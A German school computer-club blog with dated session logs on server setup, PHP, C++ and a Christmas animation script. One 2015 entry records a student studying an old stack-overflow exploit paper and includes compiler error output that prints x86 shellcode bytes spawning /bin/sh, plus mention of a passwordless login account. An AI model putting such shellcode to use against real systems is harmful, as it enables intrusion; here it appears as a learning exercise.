Computer-Ag am WvS Blog der Computer-AG am Werner von Siemens Gymnasium Berlin

26. September 2016

26.9.2016

Nächste Mal fällt aus, weil der Montag Feiertag ist.

Moritz, Morten, Angelo und Julian sind da. Wir reden über die falsch implementierte Linksassoziativität in PHP.

Wir reden über komplizierte und einfach Programmiersprachen. Go ist wohl „einfach“. Hat keinen Ternäroperator. C++ ist kompliziert.

Robert hatte Probleme auf dem Spyraserver mit „unmet dependencies“. g++ konnte nicht installiert werden. Deshalb „aptitude“ installiert.

Hier ein kleiner Code-Teil:

#include <iostream>  

using namespace std;  
     
int main()  
{  
    int z; 
    cout << "Bitte geben Sie eine Zahl ein: " << endl; 
    cin >> z; 
    cout << "z hat den Wert: " << z << endl; 
    return 0;  
}

Angelo will seine Lautgesetztprogrammierung erstmal in Python implementieren. Dabei geht es im Wesentlichen um reguläre Ausdrücke.

Auch auf dem Spyraserver das Apachemodul mod_userdir aktiviert und PHP dafür eingeschaltet.

Dazu in der „/etc/apache2/mods-enabled/userdir.conf“ eingefügt: „php_admin_value engine On“.

 

 

 

13. Juni 2016

13.6.2016

Filed under: Computer,PHP,Schulnetzwerk,Tagesberichte,Termine,Tisch — admin @ 15:53

Michael, Julian, Angelo und Morten sind da. Wir bauen die beiden neuen Server ins Rack ein und testen sie. 10.17.0.2 ist der von der AG. 10.17.0.3 ist der „spyraserver“. Robert installiert noch apache2 php7 mysql und phpmyadmin inklusive der entsprechenden Einstellungen, die es dazu braucht (mbstring, mcrypt). Läuft jetzt. Julian hat den Drucker von den Päkos ins Netz bekommen, aber der Treiber funktioniert nicht.

17. Dezember 2015

17.12.2015

Morten, Angelo, Julian und Moritz sind da. Wir verbessern noch das Weihnachtsjenskript. Morten bastelt ihm noch eine Weihnachtsmannmütze mit Gimp. Jens ist begeistert. Wir optimieren das Script noch ein bisschen. Angelo macht sich demnächst an GTA LCS für iOS.

Heute ist das letzte Mal in diesem Jahr. Willy war auch kurz da. Er kommt mit in den Verteiler.

Nächste Mal im neuen Jahr. Am 5. Januar und am 7. Januar.

 

15. Dezember 2015

15.12.2015

Morten und Moritz sind da. Morten gelingt es, sich stationär auf den Rechnern anzumelden (Stichwort: station – ohne Passwort). Das war nötig, denn mit dem Gast-Account hatte jeder Rechner hier die IP-Adresse des Server (10.16.1.1) und dann läuft das Script nicht.

Der Lernserver ist von Frau Spyra eingeschaltet worden. Er ist nicht anpinbar. Mit kill -9 kann man wohl definitiv Prozesse killen. Denn mit normalem Kill konnte ich „X :1 -query …“ nicht killen.

Wir ersetzen den laufenden Weihnachtsmann durch Jens. Es funzt.

Wir probieren einen Websocket mit Javascript, um das Weihnachtsmannscript zu optimieren.

Morten schneidet Jens jetzt noch aus. Sieht spitze aus!

17. November 2015

17.11.2015

Filed under: Allgemein,Assembler,C,PHP,Tagesberichte,Termine,Tisch — admin @ 16:00

Morten und Martin sind da. Frank Oppermann macht dankenswerter Weise den Lernserver an. Der war beim letzten Mal irgendwie nicht richtig runtergefahren.

Martin liest ein Paper zu Stackoverflow und Exploits (von 1998 vermutlich). Das Ganze funktioniert schlussendlich mit einem Interrupt (0x80).

Morten programmiert mit PHP etwas, was aus zwei ähnlichen Dateien (beide kaputt), aus Datei 2 Bytes an die Stelle von Datei 1 schreibt, wo in Datei 1 ein 0-byte steht. 0x00 in Hex-Code wohl. Sind glaube ich nur 10 Zeilen Code oder so.

Martin kann Donnerstag erst um kurz nach 16:00 hier sein. Eventuell fangen wir dann erst um 15:00 an, wenn Colin und Julian nicht kommen.

Das Komplieren klappt irgendwie nicht. Nachdem ich noch

#include <getopt.h>
#include <string.h>

in eggshell.c eingebaut habe und eggshell.h nach /usr/bin/ld kopiert habe kommt mit

rob@lernserver:~/exploit_test$ gcc eggshell.c -l shellcode.h

eggshell.c: In function ‘main’:
eggshell.c:60:3: warning: format ‘%x’ expects argument of type ‘unsigned int’, but argument 2 has type ‘long int’ [-Wformat]
/usr/bin/ld: 4: /usr/bin/ld: char: not found
/usr/bin/ld: 5: /usr/bin/ld: char: not found
/usr/bin/ld: 6: /usr/bin/ld: \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b: not found
/usr/bin/ld: 7: /usr/bin/ld: \x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd: not found
/usr/bin/ld: 8: /usr/bin/ld: \x80\xe8\xdc\xff\xff\xff/bin/sh: not found
/usr/bin/ld: 10: /usr/bin/ld: Syntax error: „(“ unexpected
collect2: ld returned 2 exit status

Donnerstag mehr …;

Powered by WordPress